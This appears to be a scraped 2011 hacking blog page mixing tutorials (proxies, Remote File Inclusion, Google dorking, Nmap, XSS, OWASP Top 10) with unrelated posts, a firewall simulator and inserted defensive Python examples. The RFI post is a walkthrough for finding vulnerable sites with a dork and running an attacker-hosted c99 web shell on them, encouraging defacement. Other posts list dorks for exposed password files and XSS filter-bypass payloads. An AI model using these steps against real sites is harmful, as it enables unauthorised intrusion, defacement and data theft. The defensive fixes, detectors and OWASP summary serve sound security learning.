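        if self.direction not in ("any", p.direction):
            return False
        if self.src != "any" and ipaddress.ip_address(p.src) not in ipaddress.ip_network(self.src):
            return False
        if self.proto not in ("any", p.proto):
            return False
        if self.dport is not None and self.dport != p.dport:
            return False
        if self.host_suffix is not None and not (
                p.host == self.host_suffix or p.host.endswith("." + self.host_suffix)):
            return False
        if self.words and not any(w in p.payload.lower() for w in self.words):
            return False
        return True


class Firewall:
    def __init__(self, rules):
        self.rules = rules
        self.established = set()   # 5-tuples of connections the LAN opened

    def decide(self, p: Packet) -> str:
        # Stateful inspection: a reply to a connection we opened is let through
        # without needing its own inbound rule.
        if p.direction == "in" and (p.dst, p.dport, p.src, p.sport, p.proto) in self.established:
            return "accept (established)"
        for rule in self.rules:                 # first matching rule wins
            if rule.matches(p):
                if rule.action == "accept" and p.direction == "out":
                    self.established.add((p.src, p.sport, p.dst, p.dport, p.proto))
                return rule.action
        return "deny (default)"


POLICY = [
    Rule("deny", src="203.0.113.0/24"),                     # block a misbehaving address range
    Rule("deny", host_suffix="games.example"),              # domain filter
    Rule("deny", words=("offensive-term",)),                # word filter, both directions
    Rule("accept", direction="in", proto="tcp", dport=80),  # the public web service
    Rule("accept", direction="out"),                        # LAN hosts may open connections
]


def demo():
    fw = Firewall(POLICY)
    return {
        "web_from_internet": fw.decide(Packet("in", "198.51.100.9", 43210, "192.0.2.10", 80)),
        "telnet_from_internet": fw.decide(Packet("in", "198.51.100.9", 43211, "192.0.2.10", 23)),
        "web_from_blocked_range": fw.decide(Packet("in", "203.0.113.7", 43212, "192.0.2.10", 80)),
        "web_with_filtered_word": fw.decide(Packet("in", "198.51.100.9", 43213, "192.0.2.10", 80,
                                                   payload="GET /?q=Offensive-Term")),
        "lan_to_games_site": fw.decide(Packet("out", "192.168.1.5", 50001, "198.51.100.20", 443,
                                              host="play.games.example")),
        "lan_to_https": fw.decide(Packet("out", "192.168.1.5", 50002, "198.51.100.20", 443)),
        "https_reply": fw.decide(Packet("in", "198.51.100.20", 443, "192.168.1.5", 50002)),
        "unsolicited_to_lan": fw.decide(Packet("in", "198.51.100.20", 443, "192.168.1.5", 50003)),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:24} {verdict}")
```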


How to Surf web Anonymously with Proxies



Are you looking to surf the Internet without anyone knowing your location or details? Do you want to regain access to a banned website or forum? Well, you've come to the right place: in this article I will answer the frequently asked questions "How do I surf the web anonymously?" and "How do I access restricted websites?"

There are many ways to surf the web anonymously. But the best way to do it without spending a single penny is by using proxies.

What is a Proxy?

A proxy is the IP address of a server (proxy server) that is placed between your computer and the Internet.

The advantage of a proxy is that your real IP address is hidden: when you hack, you give away the IP address of the proxy server and not your real IP address, and in the same way, if you are a normal Internet user, a hacker gets the IP of the proxy server rather than your real IP. You can also use it to enter a site or forum from which your IP is banned.

Follow the steps given below to surf the web anonymously.

How to surf web anonymously with proxies

First we need a proxy server. There are thousands of proxy servers on the net; you can find them with Google. I use www.hidemyass.com

Select the required proxy IP address and port from hidemyass.com

Using a Proxy in Mozilla Firefox

1. Open Mozilla Firefox and go to the Tools menu -> Options.

2. Select the Advanced tab -> Network tab -> under Connection, select Settings.

3. In Connection Settings, select Manual Proxy Configuration (radio button).

4. Enter the proxy IP address and port and click OK.

5. Refresh the google.com page.

To check whether your proxy is in use, go to www.whatismyip.com: you should see a different IP address after setting up your proxy. Bear in mind that only Firefox is sending its traffic through the proxy here (other programs on the computer still connect directly), and that the proxy operator can see and log everything you send through it.

Please comment on this tutorial if you find it useful.


Monday, May 2, 2011

RFI(Remote File Inclusion)

Remote File Inclusion

Remote File Inclusion (RFI) allows an attacker to make a website's script include and run a file hosted on another server. Remote File Inclusion is a common vulnerability found in many websites. Using RFI you can literally deface websites and get access to the server. Here I am going to describe this.

Searching the Vulnerability:

Remote File Inclusion vulnerabilities usually occur on sites whose navigation looks similar to this:

www.anywebsite.com/index.php?page=something


If you want to find more websites like this, try this Google dork:

inurl:index.php?page=

After going to the target website, test it for the RFI vulnerability. Use this:

www.anywebsite.com/index.php?page=http://www.google.com


After pressing Enter, if Google's homepage appears inside the website, then this website is vulnerable to RFI.

Now you can execute your own scripts on the web server of this website.


www.anywebsite.com/index.php?page=http://www.freehackersite.com/script.php


Look at the original URL: there is no extension. It means the script is adding the extension itself, so use "?" after your URL.

Now to gain access you should use the c99 shell. You can download the c99 shell from the link below:



Now upload this script to any web host and get its URL. Let's say your URL is like this:

www.mywebsite.com/c99.txt?

** The question mark is a must.

Now use your URL in place of the Google URL.

www.anywebsite.com/index.php?page=http://www.mywebsite.com/c99.txt?


Now you are inside the website and you can do anything with it.
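The index.php?page= include pattern described above, modelled in Python as an added example (not the post's own code) from the defender's side: the vulnerable resolver appends ".php" the way the post describes, the hardened one only accepts allowlisted page names, and a small access-log check flags requests whose page parameter carries a URL or a path. The function names, allowlist, template directory and log lines are constructed for illustration.

```python
"""Added example, not from the original post: the index.php?page= include
pattern modelled in Python. Names, the allowlist, the template directory and
the log lines below are constructed for illustration."""
import re
from urllib.parse import parse_qs, urlsplit

ALLOWED_PAGES = {"home", "about", "contact"}      # constructed allowlist
TEMPLATE_DIR = "/var/www/site/pages"              # hypothetical path
REQUEST_RE = re.compile(r'^(?P<client>\S+) .*"GET (?P<target>\S+) HTTP/1\.[01]"')


def resolve_page_vulnerable(page: str) -> str:
    """Mirrors the post: the script appends '.php' to whatever the page
    parameter holds and includes the result. With a value that ends in '?'
    the appended '.php' lands in the query string of the remote URL, which
    is why the post insists on the trailing question mark."""
    return page + ".php"


def resolve_page_safe(page: str) -> str:
    """Hardened version: the parameter is only a key into an allowlist of
    local templates, never a path fragment or a URL."""
    if page not in ALLOWED_PAGES:
        raise ValueError(f"unknown page {page!r}")
    return f"{TEMPLATE_DIR}/{page}.php"


def looks_like_inclusion_attempt(page: str) -> bool:
    """A legitimate page name never carries a URL scheme, a traversal
    sequence or an absolute path; any of these is worth alerting on."""
    if urlsplit(page).scheme:          # http://, https://, ftp://, php://, ...
        return True
    return ".." in page or page.startswith("/")


def flag_inclusion_attempts(log_lines):
    """Scan access-log lines (common log format) and return
    (client, page value) for every suspicious page= parameter."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query).get("page", []):   # parse_qs URL-decodes
            if looks_like_inclusion_attempt(value):
                hits.append((m.group("client"), value))
    return hits


# Constructed sample log: one normal request and two inclusion attempts.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/May/2011:10:00:01 +0530] "GET /index.php?page=about HTTP/1.1" 200 512',
    '203.0.113.7 - - [02/May/2011:10:00:02 +0530] "GET /index.php?page=http://www.google.com HTTP/1.1" 200 2048',
    '203.0.113.7 - - [02/May/2011:10:00:05 +0530] "GET /index.php?page=http%3A%2F%2Fhost.example%2Fc99.txt%3F HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for client, value in flag_inclusion_attempts(SAMPLE_LOG):
        print(f"{client} tried page={value!r} -> {resolve_page_vulnerable(value)}")
```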

Google Hacking

Google hacking doesn't mean hacking Google. The term is used when a hacker tries to find vulnerable targets or sensitive data using the Google search engine. In Google hacking, hackers use search engine commands to locate sensitive data and vulnerable devices on the Internet. Google supports a multitude of operators and modifiers that add a lot of power to Google searching.

I am going to explain some of the operators used in Google hacking.


intitle:

Syntax: intitle:keyword
This will return all the pages that have the word entered after intitle: in the title of the page. If you want to check for multiple keywords in the title, use allintitle: in place of intitle:.
allintitle:keyword1 keyword2....

inurl:

Syntax: inurl:keyword
This will return all the pages that have the word entered after inurl: in the URL of the page. If you want to check for multiple keywords in the URL, use allinurl: in place of inurl:.
allinurl:keyword1 keyword2....

site:
Syntax: site:Domain
This restricts the results to pages within that particular site or domain that contain the other keywords of the query.

link:
Syntax: link:URL
This will list web pages that have links to the specified web page.

intext:

Syntax: intext:keyword
This will return all the pages that have the word entered after intext: in the body text of the page. If you want to check for multiple keywords in the text, use allintext: in place of intext:.
allintext:keyword1 keyword2....

related:
Syntax: related:URL
The "related:" operator will list web pages that are "similar" to the specified web page. For example:
"related:www.hyderabadhack.blogspot.com" will list web pages that are similar to the hyderabadhack homepage.

cache:
Syntax: cache:URL
The cache operator will search through Google's cache and return the results based on those documents. You can alternatively tell cache to highlight a word or phrase by adding it after the operator and URL.

info:
Syntax: info:URL
This operator will give you the information that Google has on the given URL.

filetype:
Syntax: filetype:extension
This restricts the Google search to files on the Internet with a particular extension (e.g. doc, pdf or ppt).

The Google query syntaxes discussed above can really help people make their searches precise and get exactly what they are looking for.

Other Queries
inurl:admin filetype:txt

inurl:admin filetype:db

inurl:admin filetype:cfg

inurl:mysql filetype:txt

inurl:passwd filetype:txt

inurl:iisadmin

inurl:auth_user_file.txt

inurl:orders.txt

inurl:"wwwroot/*."

inurl:adpassword.txt

inurl:webeditor.php

inurl:file_upload.php

Looking for vulnerable sites using Google Hacks
allintitle: "index of /root"

allintitle: "index of /admin"


Block any Website on your computer without any software

There are many people who want certain websites to be inaccessible from their computer. Most parents want to block some websites on their computer system. Here I am going to write about a well-known and easy way to do this.

Steps:

1. Go to C:\WINDOWS\system32\drivers\etc
2. Find the file named "HOSTS"
3. Open this file in Notepad
4. Under "127.0.0.1 localhost" add 127.0.0.2 www.xyz.com. Now the site www.xyz.com will no longer be accessible.

You can add as many website names under this as you like by increasing the last number of the IP, as in

127.0.0.3 www.abcxyz.com
127.0.0.4 www.xyzas.com

and so on.

To unblock these websites, just erase the line corresponding to that website.
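The procedure above as an added Python example (not part of the original post): it treats the hosts file as text, appends one 127.0.0.N entry per blocked site following the post's numbering scheme, skips sites already listed, and removes entries again to unblock. One caveat the code comments on: the hosts file matches names exactly, so www.xyz.com and xyz.com are two separate entries. Function names and the sample file are constructed for illustration.

```python
"""Added example, not part of the original post: manage block entries in the
hosts file as text, following the post's scheme of one 127.0.0.N address per
blocked site. Function names are constructed; write the result back to the
file yourself (on Windows that needs Notepad run as administrator)."""
import re
from typing import List, Tuple

HOSTS_PATH = r"C:\WINDOWS\system32\drivers\etc\hosts"   # path from the post
BLOCK_TAG = "# blocked"
LOOPBACK_RE = re.compile(r"127\.0\.0\.(\d+)")


def parse_entries(hosts_text: str) -> List[Tuple[str, List[str]]]:
    """Return (address, [hostnames]) for every non-comment line."""
    entries = []
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 2:
            entries.append((fields[0], fields[1:]))
    return entries


def next_block_address(hosts_text: str) -> str:
    """Lowest unused 127.0.0.N, starting at .2 because .1 is localhost."""
    used = set()
    for address, _ in parse_entries(hosts_text):
        m = LOOPBACK_RE.fullmatch(address)
        if m:
            used.add(int(m.group(1)))
    n = 2
    while n in used:
        n += 1
    if n > 254:
        raise ValueError("no free 127.0.0.N address left")
    return f"127.0.0.{n}"


def block_sites(hosts_text: str, sites: List[str]) -> str:
    """Append one entry per site that is not already listed. The hosts file
    matches names exactly (no wildcards), so list both 'www.xyz.com' and
    'xyz.com' if the bare domain should be blocked as well."""
    known = {h.lower() for _, hosts in parse_entries(hosts_text) for h in hosts}
    text = hosts_text if hosts_text.endswith("\n") else hosts_text + "\n"
    for site in sites:
        if site.lower() in known:
            continue
        text += f"{next_block_address(text)} {site} {BLOCK_TAG}\n"
        known.add(site.lower())
    return text


def unblock_sites(hosts_text: str, sites: List[str]) -> str:
    """Drop every line whose hostnames include one of the given sites."""
    targets = {s.lower() for s in sites}
    kept = []
    for line in hosts_text.splitlines(keepends=True):
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 2 and targets.intersection(h.lower() for h in fields[1:]):
            continue
        kept.append(line)
    return "".join(kept)


# Constructed sample of a fresh Windows hosts file.
SAMPLE_HOSTS = "# Copyright (c) 1993-2009 Microsoft Corp.\n127.0.0.1 localhost\n"

if __name__ == "__main__":
    print(block_sites(SAMPLE_HOSTS, ["www.xyz.com", "www.abcxyz.com"]))
```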

Thursday, April 21, 2011

NMAP Tutorial

I think everyone in the security field knows this popular tool, which has recently evolved into the 5.x series.

Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and many other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.

Nmap was originally a command-line tool developed only for Unix/Linux-based operating systems, but now a Windows version is also available and is easy to use.

It can be used by beginners (-sT) and by pros alike (--packet-trace). A very versatile tool, once you fully understand the results.

For a quick and simple scan use:

$ nmap 192.168.x.x

Starting Nmap 5.21 (http://nmap.org) at 2011-04-10 23:06 PKT
Nmap scan report for 192.168.x.x
Host is up (0.0012s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
23/tcp open  telnet
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 10.62 seconds

Nmap - Interesting options

-f fragments packets

-D Launches decoy scans for concealment

-I IDENT Scan – find owners of processes (on UNIX systems)

-b FTP Bounce

Port Scan Types

TCP Connect scan

TCP SYN scan

TCP FIN scan

TCP Xmas Tree scan (FIN, URG, and PUSH)

TCP Null scan

TCP ACK scan

UDP scan

Nmap supports basic scanning techniques such as:

TCP connect() scanning

TCP SYN scanning

TCP FIN scanning

Fragmentation scanning

TCP reverse ident scanning

FTP bounce attack

UDP ICMP port unreachable scanning

UDP recvfrom() and write() scanning

ICMP echo scanning

Operating system detection, or OS fingerprinting, is an important part of scanning: you should know the operating system of the target machine to launch an applicable exploit on it. Nmap lets you know the running operating system; you could also find it by banner grabbing, but why do too much work? Use -O for operating system detection.

$ nmap -O 192.168.x.x
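A parser for the report format shown in the quick scan above, as an added Python example (not from the post or from the Nmap project): it turns Nmap's normal output into per-host port lists and flags open services that carry credentials in the clear, which is what a defender reviewing such a scan of their own network wants to see first. The sample report, the address and the service list are constructed for illustration.

```python
"""Added example, not from the original post or the Nmap project: parse
Nmap's normal output (the report format shown above) and check the open
ports against a simple exposure policy. The sample report and the
service list are constructed for illustration."""
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Constructed sample in the Nmap 5.x report format; address is RFC 1918.
SAMPLE_REPORT = """\
Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 23:06 PKT
Nmap scan report for 192.168.1.10
Host is up (0.0012s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
23/tcp open  telnet
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 10.62 seconds
"""

# Services that send credentials in the clear: exposed ones are findings.
CLEARTEXT_SERVICES = {"ftp", "telnet", "pop3", "imap", "rlogin"}

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


@dataclass
class HostReport:
    address: str
    # (port, protocol, state, service) as printed in the PORT table
    ports: List[Tuple[int, str, str, str]] = field(default_factory=list)


def parse_nmap_output(text: str) -> List[HostReport]:
    """One HostReport per 'Nmap scan report for' block."""
    hosts: List[HostReport] = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            hosts.append(HostReport(m.group(1)))
            continue
        m = PORT_RE.match(line)
        if m and hosts:
            port, proto, state, service = m.groups()
            hosts[-1].ports.append((int(port), proto, state, service))
    return hosts


def open_ports(report: HostReport) -> List[int]:
    return [port for port, _, state, _ in report.ports if state == "open"]


def cleartext_findings(report: HostReport) -> List[str]:
    """Open ports whose service name is a known cleartext protocol."""
    return [f"{report.address}:{port}/{proto} {service}"
            for port, proto, state, service in report.ports
            if state == "open" and service in CLEARTEXT_SERVICES]


if __name__ == "__main__":
    for host in parse_nmap_output(SAMPLE_REPORT):
        print(host.address, "open:", open_ports(host))
        for finding in cleartext_findings(host):
            print("  cleartext service exposed:", finding)
```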

Sunday, April 17, 2011

Websecurify - Free Web Application Vulnerability Scanner



Websecurify is a powerful web application security testing environment designed from the ground up to provide the best combination of automatic and manual vulnerability testing technologies. Websecurify is an integrated web security testing environment, which can be used to identify vulnerabilities by using advanced browser automation, discovery and fuzzing technologies. The platform is designed to perform automated as well as manual vulnerability tests and it is constantly improved and fine-tuned by a team of world class web application security penetration testers and the feedback from an active open source community.

The built-in vulnerability scanner and analysis engine is capable of automatically detecting many types of web application vulnerabilities as you proceed with the penetration test. The list of automatically detected vulnerabilities includes:

* SQL Injection
* Local and Remote File Include
* Cross-site Scripting
* Cross-site Request Forgery
* Information Disclosure Problems
* Session Security Problems
* many others including all categories in the OWASP TOP 10

Main Features

Some of the main features of Websecurify include:

* Available for all major platforms (Windows, Mac OS, Linux)
* Simple to use user interface
* Built-in internationalization support
* Easily extensible with the help of add-ons and plug-ins
* Exportable and customizable reports with any level of detail
* Modular and reusable design
* Powerful manual testing tools and helper facilities
* Team sharing support
* Powerful analytical and scanning technology
* Built-in service and support integration
* Scriptable support for JavaScript and Python
* Extensible via many languages including JavaScript, Python, C, C++ and Java

This is an excellent and extremely easy to use tool, I highly recommend giving it a go. You can download it here - http://www.websecurify.com/download

Monday, April 11, 2011

Cross Site Scripting

Previously I wrote about the OWASP Top 10 vulnerabilities. However, my GURUJI asked me to post on each topic individually.

Cross Site Scripting

Robert 'RSnake' Hansen is considered the guru of XSS. Let's learn what XSS is.

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Cross-site scripting holes in general can be seen as vulnerabilities which allow attackers to bypass security mechanisms. By finding clever ways of injecting malicious scripts into web pages an attacker can gain access privileges to sensitive page content, session cookies, and a variety of other objects.


XSS can be classified into three types:

1. Non-persistent

2. Persistent

3. DOM-based


Non-Persistent:


Non-persistent XSS is actually the most common vulnerability found on the Net. It is called "non-persistent" because it works on an immediate HTTP response from the victim website: it shows up when the web page takes the data provided by the attacker's client and automatically generates a result page from it for the attacker himself. Based on this, the attacker can supply some malicious code and try to make the server reflect it back in order to obtain some result.


Persistent:

A persistent XSS is also known as Stored XSS. The Persistent XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, file system, or other location), and later displayed to users in a web page without being encoded using HTML entities. A classic example of this is with online message boards, where users are allowed to post.


DOM Based XSS:

DOM-based cross-site scripting allows an attacker to work not on the victim website but on the victim's local machine.

The attacker creates a malicious page and sends it to the victim. When the victim opens the vulnerable web page on his machine, the page's own script executes the injected commands with the victim's privileges, and the attacker can easily gain control over the victim's browser session.


Finding the XSS Vulnerabilities


Most of us have tried finding an XSS hole by inserting a script like this

<script>alert('XSS')</script>

in search fields and hoping for a box to pop up saying XSS. But that is not always the way to find an XSS vulnerability.

Sometimes we need to bypass the filters.

Here we will be using a JavaScript built-in function called String.fromCharCode() that builds (decodes) a string from its character codes.

For Example


<script>alert('XSS')</script>

and

<script>alert(String.fromCharCode(88, 83, 83))</script>


Note: 88 and 83 are the ASCII values for X and S respectively. Visit http://www.asciitable.com for more.

We have many ways to bypass filters. Some of them are:

site.com/search.php?q="><script>alert('Hyderbad Hacker')</script>

site.com/search.php?q="><script>alert("Hyderbad Hacker")</script>

site.com/search.php?q="><script>alert("Hyderbad Hacker");</script>

site.com/search.php?q="><script>alert(/Hyderbad Hacker/);</script>

site.com/search.php?q=//"><script>alert(/Hyderbad Hacker/);</script>

site.com/search.php?q=abc<script>alert(/Hyderbad Hacker/);</script>

site.com/search.php?q=abc"><script>alert(/Hyderbad Hacker/);</script>

Securing against XSS

To fix the XSS vulnerability, use htmlentities, and

sanitize all user input and escape special characters in your SQL queries.

For example

The vulnerable code looks like this:

<span class="abc">Search result :</span>&nbsp;<strong><?php echo $_POST['vulnerability']; ?></strong>

To secure it, change this to:

<span class="abc">Search result :</span>&nbsp;<strong><?php
if (isset($_POST['vulnerability'])) {
    // ENT_QUOTES also encodes single quotes, so the value stays inert inside attributes too
    echo htmlentities($_POST['vulnerability'], ENT_QUOTES, 'UTF-8');
}
?></strong>

Alternatively, use the htmlspecialchars() function in PHP.

Other functions:

htmlentities() with ENT_QUOTES (also encodes quotes)

strip_tags()
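The search page from this post modelled in Python as an added example (not the post's code), tying the filter-bypass list above to the fix: a filter that only strips quote characters leaves the quote-free payloads (String.fromCharCode and the /regex/ literal) intact, while output encoding, which is what htmlentities does, neutralises every payload. The payload list and function names are constructed for illustration.

```python
"""Added example, not from the original post: the post's PHP search page
modelled in Python to compare a quote-stripping 'filter' with real output
encoding. Payloads are the ones listed in the post; names are constructed."""
import html
import re

# Payloads from the post (constructed list; the parameter is 'q').
PAYLOADS = [
    "<script>alert('XSS')</script>",
    "<script>alert(String.fromCharCode(88, 83, 83))</script>",
    '//"><script>alert(/Hyderbad Hacker/);</script>',
    "abc<script>alert(/Hyderbad Hacker/);</script>",
]

TEMPLATE = '<span class="abc">Search result :</span>&nbsp;<strong>{value}</strong>'
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def strip_quotes(value: str) -> str:
    """A common but insufficient 'filter': drop quote characters only."""
    return value.replace("'", "").replace('"', "")


def render_vulnerable(value: str) -> str:
    """Equivalent of echo $_POST['vulnerability'] with no encoding."""
    return TEMPLATE.format(value=value)


def render_filtered(value: str) -> str:
    """The quote filter applied, but still no encoding."""
    return TEMPLATE.format(value=strip_quotes(value))


def render_safe(value: str) -> str:
    """Equivalent of echo htmlentities(..., ENT_QUOTES): <, >, &, " and '
    become entities, so the browser shows them instead of parsing markup."""
    return TEMPLATE.format(value=html.escape(value, quote=True))


def has_live_script(rendered: str) -> bool:
    """True if the rendered HTML still contains a parsable <script> tag."""
    return SCRIPT_TAG.search(rendered) is not None


def survives_intact(renderer, payload: str) -> bool:
    """True if the payload reaches the page byte-for-byte unchanged."""
    return payload in renderer(payload)


def evaluate(renderer) -> int:
    """How many of the payloads reach the page as live script."""
    return sum(has_live_script(renderer(p)) for p in PAYLOADS)


if __name__ == "__main__":
    for name, renderer in [("vulnerable", render_vulnerable),
                           ("quote filter", render_filtered),
                           ("encoded", render_safe)]:
        intact = [survives_intact(renderer, p) for p in PAYLOADS]
        print(f"{name:13s} live scripts: {evaluate(renderer)}  intact: {intact}")
```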

--


I hope you like this article.

Saturday, April 9, 2011

OWASP Top Ten 2010 Web App Risks

"OWASP was started in September 2000 with its mission to create an open source community where people could advance their knowledge about web application and web services security issues by either contributing their knowledge to the education of others or by learning about the topic from documentation and software produced by the project. At the time the web application security market was just emerging and certain vendors were peddling some significant marketing claims around products that really only tested a small portion of the problems web applications were facing, and service companies were marketing application security testing that really left companies with a false sense of security."

The OWASP Top Ten list represents a broad consensus about what the most critical web application security flaws are, as determined by a variety of security experts from around the world. This information is very useful for determining whether a web application's code is secure. The OWASP survey carries extra weight as it has become a recommended or required best practice from a number of highly regarded sources. The major companies all use the OWASP Top 10 as a guide in their web application development.

The OWASP Top 10 web application risks, as of the 2010 list, are:

1. Injection

Using almost any source of data, an attacker can send a simple piece of code that exploits the syntax of a targeted interpreter. Injection can lead to data loss, corruption, or complete host takeover. To prevent injection, the use of interpreters must separate untrusted data from commands and queries. An SQL call, for example, should use bind variables and avoid dynamic queries.
2. Cross Site Scripting

This has been one of the biggest security vulnerabilities on the web for some time now. It allows attackers to hijack a user's current session and either steal information or insert hostile content. Static and dynamic tools can find some XSS problems automatically, but because each application builds output pages differently, with JavaScript, ActiveX, Flash, Silverlight, etc., automated detection is insufficient. Manual code review and penetration testing are needed. To prevent XSS, your application must keep untrusted data separate from active browser content.
3. Broken Authentication and Session Management

Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users’ identities.
4. Insecure Direct Object References

This technique is used by an attacker who is already an authorized user. They simply change a parameter value to refer a system object to another object to gain access to other data and compromise it. All object references must have proper defenses by asking for authorization to specific resources and limiting indirect references to values authorized for the current user.
5. Cross-Site Request Forgery (CSRF)

In this attack, a forged HTTP request is used to trick victims into submitting them. Image tags, XSS, and many other techniques are used to trick users. Attackers use this to have hostile data manipulation performed on the victim's account. The simplest test for this vulnerability is to check each link and form to see if they contain an unpredictable token for each user so that attackers can't forge malicious requests. Unpredictable tokens should be included in the body or URL of each HTTP request and be unique for every user session and request.
6. Security Misconfiguration

Default accounts, unused pages, unpatched flaws, and directories can all be used by attackers to gain unauthorized access. Appropriate security hardening should be performed across the entire application stack to prevent this attack. Software (including ALL code libraries) should be kept up to date, and unnecessary ports, services, pages, accounts, etc. should be removed.
7. Insecure Cryptographic Storage

Typically, hackers won't break through the cryptography directly. Instead they'll find keys, get cleartext copies of data, or find channels that automatically decrypt. To protect encrypted data, you must encrypt it in every area where it is stored long-term. Decrypted copies of the data and keys must be protected by requiring authorization.
8. Failure to Restrict URL Access

This vulnerability is so easy to exploit that it must not be ignored. If the security hole exists, an attacker could simply modify a URL to access a privileged page and possibly escalate their privileges further. Developers must verify every single page and make sure external security mechanisms or code level protections are configured properly for each page. Policies should be highly configurable to minimize hard coded issues, and enforcement mechanisms should deny access by default by requiring specific grants for users.

9. Insufficient Transport Layer Protection

If user network traffic is not protected properly, an attacker can expose data and steal accounts. A bad SSL setup can even facilitate MITM or phishing attacks. The easiest solution is to require SSL for the entire site, or at least on private pages. The SSL configuration should support only strong algorithms, and the secure flag should be set on all cookies.
10. Unvalidated Redirects and Forwards

Web apps that redirect or forward users to other URLs without proper validation of input data used to make such decisions may be vulnerable to attacks that redirect users to phishing or malware sites.

Friday, April 8, 2011

Stratiform Makes Tweaking Firefox’s Looks Simple




Usually, changing your Firefox browser's looks requires a CSS tweak, an about:config switch, or specialized downloads.

Stratiform is an all-in-one add-on that offers a variety of button, toolbar, and other visual element switches. Try out new themes and switch back without any hassle.

As Stratiform's developer notes, these kinds of tweaks required developer-level or deep-down changes before Firefox 4. With the latest release, add-ons like Stratiform make tweaking colors, dimensions, fonts, and other elements pretty simple. Click what you like, and the changes take effect instantly, with no harm to anything.

Stratiform is a free download for Firefox on Windows only, and requires Firefox 4 or later.






How to Trace Mobile Phone Numbers




Today in India (and not only in India) everyone from a child to an old man has a mobile phone. With the rapid growth of mobile phone usage in recent years, we have often observed that the mobile has become part of many illegal and criminal activities. So in most cases tracing a mobile number has become a vital part of the investigation process. Also, sometimes we just want to trace a mobile number for reasons like prank calls, blackmail and missed calls.

Even though it is not possible to trace the caller, it is possible to trace the location of the caller and find the phone network which is being used. Just have a look at the page on Tracing Indian Mobile Numbers on Wikipedia. It is sure that we can trace the location (state) and network of any mobile phone number. The wiki is updated regularly so as to provide up-to-date information on newly added mobile numbers.

If you would like a much simpler interface where you enter just the mobile phone number and get country, state, city and network operator information,

then you can try these links:



By using this information you can trace where the caller is, but not who the caller is, his name or any information about him. So if you are in an emergency and need to find the actual person behind the call, I recommend that you file a complaint and take the help of the police.

Wednesday, March 23, 2011

Motivational Lines

Those who keep trying are never defeated;
a boat afraid of the waves never gets across.

Those who keep trying are never defeated.
When the tiny ant sets off carrying a grain,

it climbs the walls and slips a hundred times;
the faith in its heart fills its veins with courage.

Climbing and falling, falling and climbing does not deter it;
in the end its labour does not go to waste.

Those who keep trying are never defeated.
The diver takes his plunges into the ocean

and time and again returns empty-handed;
pearls are not found easily in deep water.

His zeal only doubles at this wonder;
his fist does not come back empty every time.

Those who keep trying are never defeated.
Failure is a challenge, accept it;

see what was lacking and put it right.
Until you succeed, give up sleep and rest;

do not run from the field of struggle.
There is no acclaim without doing something;
those who keep trying are never defeated.

Harivansh Rai Bachchan (translated from the Hindi)